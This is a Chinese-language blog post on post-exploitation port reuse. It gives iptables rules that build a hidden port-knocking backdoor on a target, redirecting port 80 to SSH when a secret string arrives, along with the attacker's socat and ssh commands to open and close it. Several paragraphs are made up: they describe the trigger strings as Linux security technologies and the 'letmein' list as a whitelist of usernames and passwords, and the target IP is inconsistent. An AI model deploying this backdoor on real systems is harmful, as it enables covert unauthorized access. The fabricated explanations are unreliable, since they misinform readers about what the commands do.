作者名：白晝安全
主頁面鏈接： 主頁傳送門
創(chuàng)作初心： 以后賺大錢
座右銘： 不要讓時代的悲哀成為你的悲哀
專研方向： web安全，后滲透技術
每日雞湯： 精彩的人生是在有限的生命中實現(xiàn)無限價值

端口復用是指不同的應用程序使用相同端口進行通訊。

我們可以通過端口復用來達到隱藏端口的目的。其他作用還有很多，如內(nèi)網(wǎng)滲透中，搭建隧道時，服務器僅允許指定的端口對外開放。利用端口復用可以將3389或22等端口轉發(fā)到如80端口上，以便外部連接。

1. 利用IPTables進行端口復用

假設主機開放的web服務是80端口，在目標主機上執(zhí)行如下命令

# 創(chuàng)建端口復用鏈
iptables -t nat -N LETMEIN# 創(chuàng)建端口復用規(guī)則，將流量轉發(fā)至 22 端口
iptables -t nat  -A LETMEIN -p tcp -j REDIRECT --to-port 22#開啟開關，如果接收到一個含有 threathuntercoming 的 TCP 包，則將來源 IP 添加到加為 letmein 的列表中
iptables -A INPUT -p tcp -m string --string 'threathuntercoming' --algo bm -m recent --set --name letmein --rsource -j ACCEPT#關閉開關，如果接收到一個含有 threathunterleaving 的 TCP 包，則將來源 IP 從 letmein 的列表中移除
iptables -A INPUT -p tcp -m string --string 'threathunterleaving' --algo bm -m recent --name letmein --remove -j ACCEPT# let's do it，如果發(fā)現(xiàn) SYN 包的來源 IP 處于 letmein 列表中，將跳轉到 LETMEIN 鏈進行處理，有效時間為 3600 秒
iptables -t nat -A PREROUTING -p tcp --dport 80 --syn -m recent --rcheck --seconds 3600 --name letmein --rsource -j LETMEIN

ThreatHunterLeaving是一種Linux安全技術，它可以幫助系統(tǒng)管理員發(fā)現(xiàn)和響應潛在的安全威脅。它使用一系列的安全技術，如防火墻，入侵檢測系統(tǒng)，審計日志，網(wǎng)絡監(jiān)控等，來幫助系統(tǒng)管理員發(fā)現(xiàn)和響應潛在的安全威脅。

ThreatHunterComing是一種Linux安全技術，它可以幫助系統(tǒng)管理員預防和響應潛在的安全威脅。它使用一系列的安全技術，如防火墻，入侵檢測系統(tǒng)，審計日志，網(wǎng)絡監(jiān)控等，來幫助系統(tǒng)管理員預防和響應潛在的安全威脅。

LetMeIn列表是一個安全白名單，它包含了可以訪問系統(tǒng)的IP地址，用戶名和密碼。它可以幫助系統(tǒng)管理員控制哪些用戶可以訪問系統(tǒng)，以及他們可以做什么。

2、攻擊者的linux系統(tǒng)上執(zhí)行如下

#開啟復用,192.168.149.133為目標ip
echo threathuntercoming | socat - tcp:192.168.149.133:80#ssh使用80端口進行登錄
ssh -p 80 root@192.168.149.133 -T /bin/bash -i#關閉復用，此時不能用80端口進行ssh連接
echo threathunterleaving | socat - tcp:192.168.110.131:80

連接目標80端口成功連接ssh

ps：進行端口復用后同時也可以用默認的22端口進行ssh連接，并不會影響